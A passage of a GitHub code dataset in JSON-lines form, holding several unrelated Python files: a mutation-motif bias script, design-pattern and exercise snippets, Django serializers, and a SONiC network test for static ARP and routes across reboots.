sorted(positions)\n\n\treturn mutations, len(samples)\n\n\ndef compareMutRate(targetSeq, geneNames, signatures, siteRegex, baseIndexes, mutations, sampleNum, outFile, method):\n\t\"\"\"\n\t:param targetSeq: A dictionary containing geneID: DNA_Sequence\n\t:param geneNames: A dictionary storing geneID: GeneName (ex. chr1:100-1000 : ID3)\n\t:param signatures: An iterable containing all possible orientations of the mutation signatures\n\t:param siteRegex: A string representing a regular expression which represents the position of interest in the motif\n\t:param baseIndexes: An iterable listing indexes for a particular base in signatures\n\t:param mutations: A dictionary listing chromosome: [position1, position2, position3] for all mutations in the input file\n\t:param sampleNum: An int listing the number of samples in the input\n\t:param outFile: A string containing a file-path to an output file, or sys.stdout\n\t:param method: The method used to calculate the mutation bias (ex. fishers_exact)\n\t\"\"\"\n\n\t# Compile the motif signatures\n\tcompiledSig = tuple(re.compile(x) for x in signatures)\n\n\t# Store mutation which overlap the motif and site of interest\n\ttotalMotifMut = {}\n\ttotalSiteMut = {}\n\n\twith open(outFile, \"w\") if isinstance(outFile, str) else sys.stdout as o:\n\t\t# Write the file header\n\t\theader = \"\\t\".join([\"gene\", \"motif_bases\", \"gene_bases\", \"gene_mutations\", \"expected_motif_mut\",\n\t\t\t\t\t\t\t\"actual_motif_mut\", \"motif_bias\", \"motif_odds_ratio\", \"motif_site_bases\", \"gene_site_bases\",\n\t\t\t\t\t\t\t\"expected_motif_site_mut\", \"actual_motif_site_mut\", \"motif_site_bias\", \"motif_site_odds_ratio\"])\n\t\tprint(header, file=o)\n\t\tfor gene, geneSeq in targetSeq.items():\n\n\t\t\tregionLength = len(geneSeq)\n\t\t\tchrom, pos = gene.split(\":\")\n\t\t\tgeneStart, geneEnd = pos.split(\"-\")\n\t\t\tgeneStart = int(geneStart)\n\t\t\tgeneEnd = int(geneEnd)\n\t\t\t# First thing we need to is to determine how many times the specified signature occurs\n\t\t\t# in each gene\n\t\t\tsigLoc = {} # Will store the index of a given match, and the index of the base of interest for that hit\n\n\t\t\t# Find all matches (in all orientations) for this mutation signature in this gene\n\t\t\tfor sig, posIndex in zip(compiledSig, baseIndexes):\n\n\t\t\t\t# Find all instances of this motif\n\t\t\t\tpos = 0\n\n\t\t\t\t# This implementation is required to find overlapping motifs\n\t\t\t\twhile True:\n\t\t\t\t\thit = sig.search(geneSeq, pos)\n\t\t\t\t\tif hit is None: # No more instances of this motif exist in the gene sequence\n\t\t\t\t\t\tbreak\n\t\t\t\t\tx = hit.start()\n\t\t\t\t\tif x not in sigLoc:\n\t\t\t\t\t\tsigLoc[x] = []\n\t\t\t\t\tsigLoc[x].append((hit, hit.start() + posIndex))\n\t\t\t\t\tpos = x + 1\n\n\t\t\t# Calculate the number of bases which overlap the motif\n\t\t\t# Also identify which mutations overlap the signatures\n\t\t\tmotifBases = 0\n\t\t\tresidueBases = 0 # How many bases overlap this residue?\n\t\t\tmotifMut = 0\n\t\t\tnonMotifMut = 0\n\t\t\tresidueMut = 0\n\t\t\tnonResidueMut = 0\n\n\t\t\tif chrom not in totalMotifMut:\n\t\t\t\ttotalMotifMut[chrom] = []\n\t\t\t\ttotalSiteMut[chrom] = []\n\n\t\t\t# What mutation overlap this gene\n\t\t\tmutOnGene = list(x - geneStart for x in mutations[chrom] if geneStart <= x < geneEnd)\n\t\t\tmutNum = len(mutOnGene)\n\t\t\tcurrentMut = 0\n\t\t\tpositions = sigLoc.keys()\n\t\t\tcurrentPos = 0\n\t\t\tcoveredResidues = set()\n\t\t\tfor key in sorted(positions):\n\t\t\t\thits = sorted(sigLoc[key], key=lambda x: x[0].end())\n\t\t\t\tfor hit in hits:\n\t\t\t\t\t# Add the UNIQUE bases which overlap this hit to the motif overlap count\n\t\t\t\t\tif hit[0].start() > currentPos:\n\t\t\t\t\t\tstart = hit[0].start()\n\t\t\t\t\telse:\n\t\t\t\t\t\tstart = currentPos\n\t\t\t\t\tcurrentPos = hit[0].end()\n\t\t\t\t\tmotifBases += hit[0].end() - start\n\n\t\t\t\t\t# Add the UNIQUE bases overlapping the residue of interest to that count\n\t\t\t\t\tif hit[1] not in coveredResidues:\n\t\t\t\t\t\tcoveredResidues.add(hit[1])\n\t\t\t\t\t\tresidueBases += 1\n\n\t\t\t\t\t# Find any mutations which overlap these bases\n\t\t\t\t\twhile currentMut < mutNum and mutOnGene[currentMut] < start:\n\t\t\t\t\t\tcurrentMut += 1\n\t\t\t\t\t\tnonMotifMut += 1\n\n\t\t\t\t\twhile currentMut < mutNum and mutOnGene[currentMut] < hit[0].end():\n\t\t\t\t\t\ttotalMotifMut[chrom].append(mutOnGene[currentMut] + geneStart)\n\t\t\t\t\t\tmotifMut += 1\n\t\t\t\t\t\tcurrentMut += 1\n\n\t\t\twhile currentMut < mutNum:\n\t\t\t\tnonMotifMut += 1\n\t\t\t\tcurrentMut += 1\n\n\t\t\t# Count up the number of mutations which overlap the residue of interest\n\t\t\tfor mut in mutOnGene:\n\t\t\t\tif mut in coveredResidues:\n\t\t\t\t\tresidueMut += 1\n\t\t\t\t\ttotalSiteMut[chrom].append(mut + geneStart)\n\t\t\t\telse:\n\t\t\t\t\tnonResidueMut += 1\n\n\t\t\tassert residueMut + nonResidueMut == mutNum\n\t\t\tassert motifMut + nonMotifMut == mutNum\n\n\t\t\tnumCoveredResidues = len(coveredResidues)\n\n\t\t\t# Calculate the number of positions across the entire gene which correspond to the position of interest\n\t\t\ttotalSiteBases = set(x.start() for x in re.finditer(siteRegex, geneSeq))\n\t\t\tnumTotalSiteBases = len(totalSiteBases)\n\n\t\t\t# Calculate the number of mutations which overlap the oosition of interest\n\t\t\tresidueGeneMut = list(x for x in mutOnGene if x in totalSiteBases)\n\t\t\tnumResidueGeneMut = len(residueGeneMut)\n\n\t\t\t# Calculate the number of mutations which overlap said positions\n\t\t\texpectedSiteMut = round(float(numCoveredResidues) / float(numTotalSiteBases) * numResidueGeneMut)\n\t\t\t# Calculate the expected number of mutations which are expected to overlap the motif\n\t\t\texpectedMotifMut = round(mutNum * float(motifBases) / float(regionLength))\n\n\t\t\t# Calculate the p-values for each method\n\t\t\tif method == \"fisher_exact\":\n\t\t\t\tmotifPVal = fisher_exact([[motifMut, motifBases * sampleNum], [mutNum, regionLength * sampleNum]])[1]\n\t\t\t\tsitePVal = fisher_exact([[residueMut, numCoveredResidues * sampleNum], [numResidueGeneMut, numTotalSiteBases * sampleNum]])[1]\n\t\t\telif method == \"binomial_exact\":\n\t\t\t\t# Calculate the mutation rate per site across the entire region\n\t\t\t\texpMutRate = float(mutNum) / (float(regionLength) * sampleNum)\n\t\t\t\t# Run a binomial test to see if mutations are enriched in the motif\n\t\t\t\tmotifPVal = binom_test(motifMut, motifBases * sampleNum, expMutRate)\n\n\t\t\t\t# Calculate the mutation rate per position of interest across the entire region\n\t\t\t\texpPosMutRate = float(numResidueGeneMut) / (float(numTotalSiteBases) * sampleNum)\n\t\t\t\tsitePVal = binom_test(residueMut, numCoveredResidues * sampleNum, expPosMutRate)\n\n\t\t\t# Calculate the odds ratio for the motif and site\n\t\t\tif mutNum == 0 or motifBases == 0: # There are no mutations in the region of interest\n\t\t\t\tmotifOddsRatio = \"NA\"\n\t\t\telse:\n\t\t\t\tmotifOddsRatio = (motifMut / (motifBases * sampleNum - motifMut)) / (float(mutNum) / (regionLength * sampleNum - float(mutNum)))\n\t\t\tif numResidueGeneMut == 0 or numCoveredResidues ==0 : # There are no residue mutations in the region\n\t\t\t\tsiteOddsRatio = \"NA\"\n\t\t\telse:\n\t\t\t\tsiteOddsRatio = (residueMut / (numCoveredResidues * sampleNum - residueMut)) / (float(numResidueGeneMut) / (numTotalSiteBases * sampleNum - float(numResidueGeneMut)))\n\n\t\t\t# Generate output\n\t\t\toutLine = \"\\t\".join([geneNames[gene], str(motifBases), str(regionLength), str(mutNum), str(expectedMotifMut),\n\t\t\t\t\t\t\t\tstr(motifMut), str(motifPVal), str(motifOddsRatio), str(numCoveredResidues), str(numTotalSiteBases), str(expectedSiteMut),\n\t\t\t\t\t\t\t\tstr(residueMut), str(sitePVal), str(siteOddsRatio)])\n\n\t\t\tprint(outLine, file=o)\n\n\t\treturn totalMotifMut, totalSiteMut\n\n\ndef complimentSignature(sequence, index):\n\t\"\"\"\n\tGenerate all orientations of the specified sequence\n\n\t:param sequence: A string consisting of IUPAC bases corresponding to the signature of interest\n\t:param index: An integer corresponding to a given position in the sequence (1-based)\n\t:return: A tuple containing all orientations for the input sequence\n\t\"\"\"\n\n\tsignatures = []\n\tindexes = []\n\n\tcompliment = {\n\t\t'A': 'T',\n\t\t'T': 'A',\n\t\t'C': 'G',\n\t\t'G': 'C',\n\t\t'U': 'A',\n\t\t'R': 'Y',\n\t\t'Y': 'R',\n\t\t'S': 'S',\n\t\t'W': 'W',\n\t\t'K': 'M',\n\t\t'M': 'K',\n\t\t'B': 'V',\n\t\t'D': 'H',\n\t\t'H': 'D',\n\t\t'V': 'B',\n\t\t'N': 'N'\n\t}\n\n\tIUPACCodeDict = {\n\t\t'A': 'A', # Adenine\n\t\t'C': 'C', # Cytosine\n\t\t'G': 'G', # Guanine\n\t\t'T': 'T', # Thymine\n\t\t'R': '[AG]', # A or G\n\t\t'Y': '[CT]', # C or T\n\t\t'S': '[GC]', # G or C\n\t\t'W': '[AT]', # A or T\n\t\t'K': '[GT]', # G or T\n\t\t'M': '[AC]', # A or C\n\t\t'B': '[CGT]', # C or G or T\n\t\t'D': '[AGT]', # A or G or T\n\t\t'H': '[ACT]', # A or C or T\n\t\t'V': '[ACG]', # A or C or G\n\t\t'N': '[ACGT]', # any base\n\t}\n\n\t# Generate a reverse compliment of this sequence\n\ttry:\n\t\tcomplimentSeq = \"\".join(list(compliment[x] for x in sequence))\n\texcept KeyError: # A non-IUPAC base is present in the sequence\n\t\t# Find the bad base\n\t\tfor char in sequence:\n\t\t\tif char not in complimentSeq:\n\t\t\t\traise TypeError(\"Unrecognized IUPAC base: %s\" % char)\n\n\t\t# Something has gone horribly wrong!!!!\n\t\traise TypeError(\"Unrecognized IUPAC base in: %s\" % sequence)\n\n\t# Convert ambiguous IUPAC bases into regular expressions\n\n\t# First orientation: The input orientation\n\tforwardRegex = list(IUPACCodeDict[x] for x in sequence)\n\tsignatures.append(\"\".join(forwardRegex))\n\tindexes.append(index - 1)\n\n\t# Second orientation: Reverse\n\tsignatures.append(\"\".join(forwardRegex[::-1]))\n\tindexes.append(len(forwardRegex) - index)\n\n\t# Third orientation: Compliment\n\treverseRegex = list(IUPACCodeDict[x] for x in complimentSeq)\n\tsignatures.append(\"\".join(reverseRegex))\n\tindexes.append(index - 1)\n\n\t# Fourth orientation: Reverse compliment:\n\tsignatures.append(\"\".join(reverseRegex[::-1]))\n\tindexes.append(len(reverseRegex) - index)\n\n\t# Finally, generate a regular expression just for the position of interest\n\tsitePos = IUPACCodeDict[sequence[index - 1]] # Bases which correspond to the IUPAC symbol for the position of interest\n\tsitePos = sitePos + IUPACCodeDict[compliment[sequence[index - 1]]] # Reverse compliment\n\tsitePos = set(sitePos) # Remove duplicates\n\tsitePos.discard(\"[\")\n\tsitePos.discard(\"]\")\n\tsiteRegex = \"[\" + \"\".join(list(sitePos)) + \"]\"\n\treturn signatures, indexes, siteRegex\n\n\ndef writeMutations(motifMut, siteMut, outFile, inFile, signature):\n\t\"\"\"\n\tGenerates one of more MAF files (as specified) which contains mutations overlapping the motif or site of interest\n\n\t:param motifMut: A dictionary listing chrom: [positions] for mutations which overlap the signature of interest\n\t:param motifMut: A dictionary listing chrom: [positions] for mutations which overlap the position of interest\n\t:param outFile: A string containing a filepath to the output file for annotated mutations\n\t:param inFile: A string containing a filepath to the original MAF file\n\t\"\"\"\n\n\t# Convert the mutations to sets for fast random lookup of mutations\n\ttmp = {}\n\tfor chrom, variants in motifMut.items():\n\t\ttmp[chrom] = set(variants)\n\tmotifMut = tmp\n\ttmp = {}\n\tfor chrom, variants in siteMut.items():\n\t\ttmp[chrom] = set(variants)\n\tsiteMut = tmp\n\n\twith open(inFile) as f, open(outFile, \"w\") as o:\n\n\t\tfor line in f: # Look at each mutation in the input file\n\n\t\t\toLine = line.rstrip(\"\\n\").rstrip(\"\\r\")\n\t\t\t# Write the header to both output files\n\t\t\tif line.startswith(\"#\") or line.startswith(\"Hugo_Symbol\"):\n\t\t\t\toLine = oLine + \"\\tMutation_Overlap_\" + signature + os.linesep\n\t\t\t\to.write(oLine)\n\t\t\t\tcontinue\n\n\t\t\t# Parse the chromosome and position of each mutation\n\t\t\ttry:\n\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\tchrom = cols[4]\n\t\t\t\tposition = int(cols[5]) - 1\n\n\t\t\texcept (IndexError, TypeError):\n\t\t\t\traise TypeError(\"Unable to parse input MAF file. It may be malformed.\")\n\n\t\t\tvariantOverlap = \"FALSE\"\n\t\t\tif chrom in siteMut and position in siteMut[chrom]:\n\t\t\t\tvariantOverlap = \"SITE\"\n\t\t\telif chrom in motifMut and position in motifMut[chrom]:\n\t\t\t\tvariantOverlap = \"MOTIF\"\n\n\t\t\toLine = oLine + \"\\t\" + variantOverlap + os.linesep\n\t\t\to.write(oLine)\n\n\ndef main(args=None):\n\n\tif args is None:\n\t\targs = getArgs()\n\n\t# Load gene sequences\n\tgeneSequences, geneNames = loadGeneSequences(args.targets, args.reference)\n\n\t# Generate all orientations of the signature sequence\n\tsignatures, mutIndex, siteRegex = complimentSignature(args.signature, args.index)\n\n\t# Load the mutations from the MAF file\n\tmutations, sampleCount = loadMutations(args.maf_file)\n\n\t# Calculates the expected and actual number of mutations that overlap said motif, and the position of interest\n\tmotifMut, siteMut = compareMutRate(geneSequences, geneNames, signatures, siteRegex, mutIndex, mutations, sampleCount, args.output, args.method)\n\n\tif args.annotate_maf is not None:\n\t\twriteMutations(motifMut, siteMut, args.annotate_maf, args.maf_file, args.signature)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"morinlab/lab_scripts","sub_path":"CheckMotifMutBias/CheckMotifMutBias.py","file_name":"CheckMotifMutBias.py","file_ext":"py","file_size_in_byte":17928,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"30919133002","text":"class Borg(object):\n _shared_state = {}\n def __new__(cls, *args, **kwargs):\n obj = super(Borg, cls).__new__(cls, *args, **kwargs)\n obj.__dict__ = cls._shared_state\n return obj\n \n\n\nb = Borg()\nb1 = Borg()\nb.x = 4\n\nprint(\"Borg Object 'b': \", b)\nprint(\"Borg Object 'b1': \", b1)\nprint(\"Object State 'b':\", b.__dict__)\nprint(\"Object State 'b1':\", b1.__dict__)\n","repo_name":"parkilwoo/python_design_pattern","sub_path":"singleton/monostate2.py","file_name":"monostate2.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71549992160","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom builtins import range\nfrom future.utils import iteritems\nimport logging\n\n\nlog = logging.getLogger()\n\n\nclass Validator(object):\n @staticmethod\n def validate_inventory(device_spec, device_inventory):\n for device_cat, device_dict in iteritems(device_inventory):\n if device_cat not in device_spec:\n log.error('{} not in {}'.format(device_cat, set(device_spec)))\n return False\n device_set = set(device_spec[device_cat])\n for device in device_dict:\n if device not in device_set:\n log.error('{} not in {}'.format(device, device_set))\n return False\n return True\n\n @staticmethod\n def validate_mapping(task_set, device_inventory, mapping):\n inventory = InventoryManager(device_inventory)\n device_set = inventory.get_device_set()\n for task, device in iteritems(mapping):\n if task not in task_set:\n log.error('{} not in {}'.format(task, set(task_set)))\n return False\n if device not in device_set:\n log.error('{} not in {}'.format(device, set(device_set)))\n return False\n return True\n\n\nclass LinkHelper(object):\n _LINK_SYMBOL = ' -> '\n\n @classmethod\n def get_edge(cls, src, dst):\n \"\"\"\n Args:\n src (str)\n dst (str)\n Returns:\n link_str (str): 'src -> dst'\n \"\"\"\n return '{}{}{}'.format(src, cls._LINK_SYMBOL, dst)\n\n @classmethod\n def get_nodes(cls, link_str):\n \"\"\"\n Args:\n link_str (str): 'src -> dst'\n Returns:\n src (str)\n dst (str)\n \"\"\"\n src, dst = link_str.split(cls._LINK_SYMBOL)\n return src, dst\n\n\nclass InventoryManager(object):\n\n def __init__(self, inventory, spec=None):\n record, device_map = self._init_inventory_record(inventory)\n self._inventory = inventory\n self._record = record\n self._device_map = device_map\n if spec is None:\n spec = dict({})\n self._spec = spec\n\n def get_device_set(self):\n \"\"\"\n Returns:\n all_devices (set of str): names of all devices\n \"\"\"\n return set(self._device_map)\n\n def get_device_record(self):\n \"\"\"\n Returns:\n device record (dict): categorized device names\n \"\"\"\n return self._record\n\n @staticmethod\n def _gen_device_name(device_type, device_id):\n return '{}.{}'.format(device_type.name, device_id)\n\n @classmethod\n def _init_inventory_record(cls, inventory):\n \"\"\"\n Args:\n inventory (dict)\n Returns:\n Record (dict)\n device_map (dict): {device_name: (device_cat, device_type)}\n \"\"\"\n record = {}\n device_map = {}\n for device_cat, device_dict in iteritems(inventory):\n record[device_cat] = {}\n for device_type, n_device in iteritems(device_dict):\n record[device_cat][device_type] = []\n for device_id in range(n_device):\n device_name = cls._gen_device_name(device_type, device_id)\n record[device_cat][device_type].append(device_name)\n assert device_name not in device_map\n device_map[device_name] = (device_cat, device_type)\n return record, device_map\n\n def reset_inventory_record(self):\n self._record, self._all_devices = (\n self._init_inventory_record(self.inventory))\n\n def pop(self, device_cat, device_type):\n device_list = self._record[device_cat][device_type]\n assert len(device_list) > 0\n return device_list.pop(0) # pop the first item\n\n def push(self, device_name):\n device_cat, device_type = self._device_map[device_name]\n device_list = self._record[device_cat][device_type]\n assert len(device_list) < self._inventory[device_cat][device_type]\n device_list.append(device_name)\n\n def get_spec(self, device_name, item=None):\n device_cat, device_type = self._device_map[device_name]\n if device_cat in self._spec:\n if device_type in self._spec[device_cat]:\n return self._spec[device_cat][device_type]\n log.error('cannot find spec')\n assert False\n return None\n\n def has_device(self, device_name):\n return device_name in self._device_map\n","repo_name":"nesl/Heliot","sub_path":"main/placethings/placethings/config/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"23233052449","text":"from django.db import IntegrityError\nfrom django.db.models import Q\n\nfrom rest_framework import serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom authentication.serializers import AccountSerializer\n\nfrom .models import Project, Order, OrderVM\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n owner = AccountSerializer(read_only=True, required=False)\n\n class Meta:\n model = Project\n fields = ('id', 'owner', 'name')\n # NOTICE if 'name' is added to read_only_fields, the name column of the POST data will not be available in\n # validated_data, and hence not available to serializer.save(). We shall at least have some unique fields\n # ('name' here) excluded from read_only_fields and force user to specify; otherwise we cannot tell whether\n # an object POST'ed by the user is an existing one (yes, the deep reason is that we are implementing a\n # tolerant version of create/POST).\n read_only_fields = ('id', 'owner')\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(ProjectSerializer, self).get_validation_exclusions()\n return exclusions + ['owner']\n\n def create(self, validated_data):\n project, _ = Project.objects.get_or_create(**validated_data)\n return project\n\n\nclass OrderVMSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = OrderVM\n fields = ('id', 'name', 'sockets', 'cpus_per_socket', 'memory_GB', 'nics')\n read_only_fields = ()\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(OrderVMSerializer, self).get_validation_exclusions()\n return exclusions + []\n\n\nclass OrderSerializer(serializers.ModelSerializer):\n project = ProjectSerializer()\n VMs = OrderVMSerializer(many=True, required=False)\n\n class Meta:\n model = Order\n fields = ('id', 'project', 'is_active', 'created_at', 'updated_at', 'VMs')\n read_only_fields = ('created_at', 'updated_at')\n\n def get_validation_exclusions(self, *args, **kargs):\n exclusions = super(OrderSerializer, self).get_validation_exclusions()\n return exclusions + ['project', 'VMs']\n\n def create(self, validated_data):\n # The validators ensures existence of the data element for us, therefore calls to pop() needs no default values.\n VMs_data = validated_data.pop('VMs')\n project_data = validated_data.pop('project')\n is_active = validated_data.pop('is_active')\n owner = validated_data.pop('owner')\n # The project may or may not exist, create a one if necessary\n project, _ = Project.objects.get_or_create(owner=owner, **project_data)\n\n # TODO thread-safety\n vm_names = [d['name'] for d in VMs_data]\n vms = OrderVM.objects.filter(Q(project__exact=project) & Q(name__in=vm_names))\n if vms:\n raise ValidationError(\"VMs with the name(s) %s already exist in the project '%s'\" %(\n ', '.join([\"'%s'\" % vm.name for vm in vms]), project.name))\n\n # There is really nothing unique about an order, just create().\n order = Order.objects.create(project=project, is_active=is_active, **validated_data)\n for d in VMs_data:\n OrderVM.objects.create(project=project, order=order, **d)\n return order\n\n def update(self, instance, validated_data):\n # The validators ensures existence of the data element for us, therefore calls to pop() needs no default values.\n project_data = validated_data.pop('project')\n is_active = validated_data.pop('is_active')\n owner = validated_data.pop('owner')\n VMs_data = validated_data.pop('VMs')\n\n try:\n project = Project.objects.get(owner=owner, **project_data)\n if project != instance.project:\n raise ValidationError('the project of the order cannot be mutated')\n except Project.DoesNotExist:\n raise ValidationError('the project of the order cannot be mutated (to an nonexisting one)')\n\n names = [d['name'] for d in VMs_data]\n all_vms = OrderVM.objects.filter(Q(project__exact=project) & Q(name__in=names))\n for d in VMs_data:\n name = d.pop('name')\n # shall contain at most one element, due to uniqueness of (project, name)\n vms = all_vms.filter(Q(name__exact=name))\n if not vms:\n OrderVM.objects.create(project=project, order=instance, name=name, **d)\n elif len(vms) == 1:\n vm = vms[0]\n if vm.order != instance:\n raise ValidationError(\n \"the VM with name '%s' within project '%s' is already defined in another order '%s\" % (\n name, project.id, vm.order.id))\n else:\n for attr, value in d.items():\n setattr(vm, attr, value)\n vm.save()\n else:\n raise\n\n instance.is_active = is_active\n instance.save()\n return instance\n","repo_name":"sunrenjie/bangus","sub_path":"workflow/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"45771698882","text":"# Exercício Python 038: Escreva um programa que leia dois números inteiros e compare-os. mostrando na tela uma mensagem:\n# - O primeiro valor é maior\n# - O segundo valor é maior\n# - Não existe valor maior, os dois são iguais\n\nlimpa = '\\033[m'\nazul = '\\033[34m'\namarelo = '\\033[33m'\n\nprint('{:-^40}'.format('Digite dois valores'))\n\nn1 = int(input('Primeiro valor: '))\nn2 = int(input('Segundo valor: '))\n\nif n1 == n2:\n print('Os {1}DOIS{0} são {2}IGUAIS!{0}'.format(limpa, amarelo, azul))\nelif n1 > n2:\n print('O {1}PRIMEIRO{0} é {2}MAIOR{0} que o {1}SEGUNDO{0}'.format(\n limpa, amarelo, azul))\nelse:\n print('O {1}SEGUNDO{0} é {2}MAIOR{0} que o {1}PRIMEIRO{0}'.format(\n limpa, amarelo, azul))\n","repo_name":"ARRETdaniel/Python_exerc-cios","sub_path":"Exercícios/ex038-igual-ou-maior.py","file_name":"ex038-igual-ou-maior.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25945656437","text":"class Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n result = []\n\n\n def dfs(elem, v):\n if sum(elem) == target:\n result.append(elem[:])\n return\n elif sum(elem) > target:\n return\n\n\n for i in range(v, len(candidates)):\n if candidates[i] == 0:\n return\n elem.append(candidates[i])\n dfs(elem, i)\n elem.pop()\n\n\n dfs([], 0)\n \n return result","repo_name":"wndudrla1011/LeetCode","sub_path":"39-combination-sum/39-combination-sum.py","file_name":"39-combination-sum.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"3908617004","text":"import pytest\n\nfrom spytest import st, tgapi, SpyTestDict\n\nimport apis.routing.arp as arp_obj\nimport apis.system.reboot as rb_obj\nimport apis.system.basic as basic_obj\nimport apis.routing.ip as ip_obj\nimport apis.routing.bgp as bgp_obj\n\nfrom utilities.common import poll_wait\n\ndef init_vars():\n global vars\n vars = st.ensure_min_topology(\"D1T1:2\")\n\ndef initialize_variables():\n global data\n data = SpyTestDict()\n data.static_arp_mac = \"00:00:00:00:00:66\"\n data.static_arp_ip = \"192.168.12.2\"\n data.ipv4_address_tgen = \"10.10.10.2\"\n data.ipv4_address = \"10.10.10.1\"\n data.ipv4_address_network = \"20.20.20.0/24\"\n data.mask = \"24\"\n data.src_mac_addr = \"00:00:01:02:03:04\"\n data.ipv4_address_1 = \"192.168.12.1\"\n\ndef get_parms():\n data.platform = basic_obj.get_hwsku(vars.D1)\n data.constants = st.get_datastore(vars.D1, \"constants\", \"default\")\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef arp_static_route_reboot_module_hooks(request):\n # add things at the start of this module\n init_vars()\n initialize_variables()\n get_parms()\n\n global tg_handler\n tg_handler = tgapi.get_handles_byname(\"T1D1P1\", \"T1D1P2\")\n global tg\n tg = tg_handler[\"tg\"]\n st.log(\"configuring static route\")\n adding_static_route()\n st.log(\"Getting ARP entry dynamically\")\n adding_dynamic_arp()\n ip_obj.config_ip_addr_interface(vars.D1, vars.D1T1P2, data.ipv4_address_1, data.mask, family=\"ipv4\", config='add')\n st.log(\"Configuring static ARP\")\n arp_obj.add_static_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, vars.D1T1P2)\n st.log(\"Verifying static route entries before save and reboot/fast-reboot/warm-reboot\")\n static_route_verify()\n st.log(\"Verifying dynamic ARP entries before save and reboot/fast-reboot/warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.ipv4_address_tgen, data.src_mac_addr, vars.D1T1P1):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n else:\n st.log(\"Verified that dynamic ARP entry is present in arp table\")\n st.log(\"Verifying static ARP entries before save and reboot/fast-reboot/warm-reboot\")\n if not arp_obj.verify_arp(vars.D1, data.static_arp_ip, data.static_arp_mac, \"\"):\n st.report_fail(\"static_arp_create_fail\", vars.D1)\n else:\n st.log(\"Verified that static ARP entry is present in arp table\")\n st.log(\"Save the config on the DUT\")\n rb_obj.config_save(vars.D1)\n st.log(\"saving config in vtysh mode to save static route\")\n rb_obj.config_save(vars.D1, shell=\"vtysh\")\n yield\n # Below step will clear IP adresses configured on different interfaces in the device\n ip_obj.clear_ip_configuration(st.get_dut_names())\n #Below step will clear static route configured in the device\n ip_obj.delete_static_route(vars.D1, data.ipv4_address_tgen, data.ipv4_address_network, family='ipv4', shell=\"vtysh\")\n #Below step will delete static arp entries configured in the device\n arp_obj.delete_static_arp(vars.D1, data.static_arp_ip, vars.D1T1P2)\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef arp_static_route_reboot_func_hooks(request):\n # add things at the start every test case\n # use 'st.get_func_name(request)' to compare\n # if any thing specific a particular test case\n yield\n # add things at the end every test case\n # use 'st.get_func_name(request)' to compare\n # if any thing specific a particular test case\n\ndef adding_static_route():\n st.log(\"About to add ipv4 address on TGen connected interface\")\n ip_obj.config_ip_addr_interface(vars.D1, vars.D1T1P1, data.ipv4_address, data.mask, family=\"ipv4\", config='add')\n st.log(\"Enabling docker routing config mode to split\")\n bgp_obj.enable_docker_routing_config_mode(vars.D1)\n st.log(\"configuring static route via vtysh mode\")\n ip_obj.create_static_route(vars.D1, data.ipv4_address_tgen, data.ipv4_address_network, shell=\"vtysh\", family=\"ipv4\")\n\ndef static_route_verify():\n st.log(\"Ip address configuration verification\")\n if not poll_wait(ip_obj.verify_interface_ip_address, 60, vars.D1, vars.D1T1P1, \"{}/{}\".format(data.ipv4_address, data.mask),\n family=\"ipv4\"):\n st.report_fail(\"ip_routing_int_create_fail\", vars.D1T1P1)\n else:\n st.log(\"Successfully added ipv4 address on TGen connected interface\")\n\n st.log(\"static route configuration verification\")\n if not poll_wait(ip_obj.verify_ip_route, 60, vars.D1, \"ipv4\", ip_address=data.ipv4_address_network, type=\"S\"):\n st.error(\"Static route - {} information not exists.\".format(data.ipv4_address_network))\n st.report_fail(\"ip_static_route_create_fail\", data.ipv4_address_network)\n else:\n st.log(\"creation of static route is successful\")\n\ndef adding_dynamic_arp():\n data.h1 = tg.tg_interface_config(port_handle=tg_handler[\"tg_ph_1\"], mode='config', intf_ip_addr=data.ipv4_address_tgen,\n gateway=data.ipv4_address, src_mac_addr=data.src_mac_addr, arp_send_req='1')\n st.log(\"INTFCONF: \" + str(data.h1))\n st.log(\"Pinging from tgen to DUT's TGen connected IPV4 interface\")\n res = tgapi.verify_ping(src_obj=tg, port_handle=tg_handler[\"tg_ph_1\"], dev_handle=data.h1['handle'], dst_ip=data.ipv4_address,\n ping_count='1', exp_count='1')\n st.log(\"PING_RES: \" + str(res))\n if res:\n st.log(\"Ping succeeded.\")\n else:\n st.log(\"Ping failed.\")\n st.wait(5)\n if not arp_obj.show_arp(vars.D1, data.ipv4_address_tgen):\n st.report_fail(\"ARP_entry_dynamic_entry_fail\", data.ipv4_address_tgen, vars.D1)\n\ndef test_ft_arp_static_route_config_mgmt_verifying_config_with_warm_reboot():\n '''\n Author: Surendra Kumar Vella(surendrakumar.vella@broadcom.com)\n Verify static ARP route config after warm-reboot\n '''\n\n st.log(\"Checking whether the platform supports warm-reboot\")\n if not data.platform.lower() in data.constants['WARM_REBOOT_SUPPORTED_PLATFORMS']:\n st.report_unsupported('test_case_unsupported')\n st.log(\"Performing warm-reboot on 